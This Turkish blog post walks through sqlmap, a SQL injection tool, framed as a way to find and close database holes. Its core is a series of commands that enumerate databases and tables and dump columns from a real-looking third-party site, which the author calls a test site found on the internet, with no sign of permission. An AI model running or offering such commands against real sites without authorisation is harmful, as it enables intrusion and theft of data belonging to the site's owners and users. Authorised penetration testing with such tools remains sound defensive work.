Çarşamba 1 Şubat 2023
Hakkında
Yazarlarımız
Reklam
Künye
İletişim
Webmaster.Kitchen – Türkiye'nin Webmaster MutfağıWebmaster.Kitchen – Türkiye'nin Webmaster Mutfağı

Bülten

Sosyal Medya Yasası Kabul Edildi

Binance ‘e Siber Saldırı

Webmaster.Kitchen – Türkiye'nin Webmaster MutfağıWebmaster.Kitchen – Türkiye'nin Webmaster Mutfağı
  • BAŞLARKEN
    • KOD
      • PHP
      • Asp.Net
      • Swift
      • MySQL
      • CMS
  • TASARIM
    • İpuçları
    • Çizim
    • Illustrator
    • Photoshop
    • Trendler
  • ARAYÜZ
    • JavaScript
    • HTML5
    • CSS
    • REACT
  • İPUÇLARI
    • API
    • Güvenlik
    • IDE
    • Framework
    • OS
    • Verimlilik
    • İçerik
      • Dökümantasyon
      • İpuçları
      • Nasıl Oluşturulur?
  • KAYNAKLAR
    • Tasarım
    • Kod
    • İş
  • GİRİŞİM
    • Finans
    • Girişimci
    • Nasıl yapılır?
  • ARAÇLAR
  1. Anasayfa
  2. Güncel
  3. SQLmap – Veri Tabanı Açıklarınızı Kapatın
 SQLmap – Veri Tabanı Açıklarınızı Kapatın
Güncel Güvenlik

SQLmap – Veri Tabanı Açıklarınızı Kapatın

Yazar : Furkan Baycan 31 Mayıs 2017 0 Comment

Arkadaşlar herkese merhaba. Bugün yine bir Linux aracı ile karşınızdayız. Aracımızın adı Sqlmap. Sqlmap, siteler üzerine yapılabilecek Sql İnjection ve XSS saldırıları gibi veri tabanına yönelik saldırılara karşı bir korumanız var mı? yok mu? onu belirler.

Eğer bir koruma yoksa veri tabanı verilerinin bir text dosyasına çekebilmeyi sağlar. Yani hem Sqli taraması, hem Sqli saldırısı yapımında kullanılan bir araçtır. Kullanımı gayet basittir. Biz de bugün bir test sitesi üzerinde bu aracın nasıl kullanılacağını kısa bir test sonucunda bulacağız.

Öncelikle Kali sistem kullanan arkadaşlar şanslılar bu araç otomatik olarak yüklü geliyor. Ben Kali kullanmıyorum diyen arkadaşlarımız ise. Aşağıda belirttiğimiz komutla, git üzerinden alabilirler.

git clone git://git.kali.org/packages/sqlmap.git

Bu komutu çalıştırabilmeniz için de git paketinin bilgisayarınızda yüklü olması lazım onu kurabilmeniz için de aşağıdaki komutu çalıştırabilirsiniz.

sudo apt install git

Gelelim nasıl kullanılacağına, ilk olarak sizlere kullanacağımız parametreleri tanıtmak istiyorum.

-u = Adres girdisi yapacağımız zaman kullanırız. Kullanacağımız adres, test sitesi üzerinde SQL hatası aldığımız herhangi bir link olabilir.

–dbs = Veri tabanlarını belirleyip çekebilmemize yardımcı olan komuttur.

–tables -D = Belirlenen veri tabanı tablosunun adı

–columns = Belirlediğimiz veri tabanı tablosunun, istediğimiz herhangi bir sütunu

–dump = Belirlediğimiz sütunun içindeki verileri çekmemize yarar.

Devam etmeden bir noktaya parmak basmak istiyorum. Bu aracın tanıtımı tamamen açıkları taramak ve kapatabilmek adına yapılan bir testten ibaret. Dolayısıyla aşağıda gerçekleştireceğimiz veri tabanı çekme işlemlerini sadece komut olarak vereceğim.

İnternetten bulduğumuz bir test sitesini kullanacağız. Sitenin adı “ceburealproperty.com”.  İlk yapacağımız işlem veri tabanının belirlemesini yapıyoruz. Bunun için ise

sqlmap -u "http://ceburealproperty.com/show_cat_page.php?id=3" --dbs


Bu işlemden sonra yapacağımız işlem tablo adı yazıp çekme işlemi yapmak.

sqlmap -u "http://ceburealproperty.com/show_cat_page.php?id=3" --tables -D cebureal_db 


Sqlmap, Python dili ile yazılmış olup ekstra bir komut kullanılmamış gördüğünüz üzere de kullanımı gayet basit derecede. İşlemi varsayılan olarak GET işlemiyle yapıyor. Peki, işlemi POST şekilde yapma olanağımız var mı?
Elbette var aşağıdaki komut olarak kullanırsanız her şey mevcut.

sqlmap -u "http://ceburealproperty.com/show_cat_page.php?id=3" --data="Post verisi" --dbms

Veri tabanını buldunuz. Tabloları belirlediniz. Ancak tüm tablolar beni ilgilendirmiyor diyorsanız,

sqlmap -u "http://ceburealproperty.com/show_cat_page.php?id=3" --dump -C kolon1,kolon2 -D database_adi -T tablo_Adi

Tüm sorguların bir kaydını almak isterseniz,

sqlmap -u "http://ceburealproperty.com/show_cat_page.php?id=3" --dbms -t /usr/share/log.txt

Genel olarak komutlar bu şekilde. Son bir noktaya değinelim ve bugünlük olayımızı tamamlayalım. “Ben her şeyi yaptım, ancak indirdiğim verileri bulamıyorum.” diyorsanız. Linux üzerinde home dizini altında .sqlmap diye bir klasör saklıdır. “CTRL + H” tuşlayarak gizli klasör ve dosyaları görebilirsiniz.

Sorularınız olursa yorum yoluyla bize iletmekten çekinmeyin. Sağ üst köşede yer alan mail aboneliği kısmından abone olabilir, en yeni yayınlarımızdan ilk olarak siz yararlanabilirsiniz. Herkese mutlu günler ve iyi çalışmalar. 🙂

Etiketler: kali araçları kali tools sql injection sql injection nasıl önlenir sqlmap sqlmap kullanım sqlmap kullanımı
Önceki Yazı
Sonraki Yazı

Furkan Baycan (Website)

administrator

Güvenlik ve Web Programcılığı alanında çalışıyorum. Bu alanlarda da sizler için mutfakta yazılar yazıyorum. Siz de çok değerli projeleriniz ve yorumlarınızla mutfağa katkıda bulunabilirsiniz.

Yorum Yap Yorumu İptal Et.

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Taze Yazılar
Güncel

Sosyal Medya Yasası Kabul Edildi

14 Ekim 2022
Blockchain

Binance ‘e Siber Saldırı

8 Ekim 2022
Blockchain

Binance ‘den Ücretsiz Eğitim

5 Ekim 2022
Güncel

Japonya için Yenilenen Corolla

4 Ekim 2022
© 2021 Webmaster Kitchen. Tüm Hakları Saklıdır.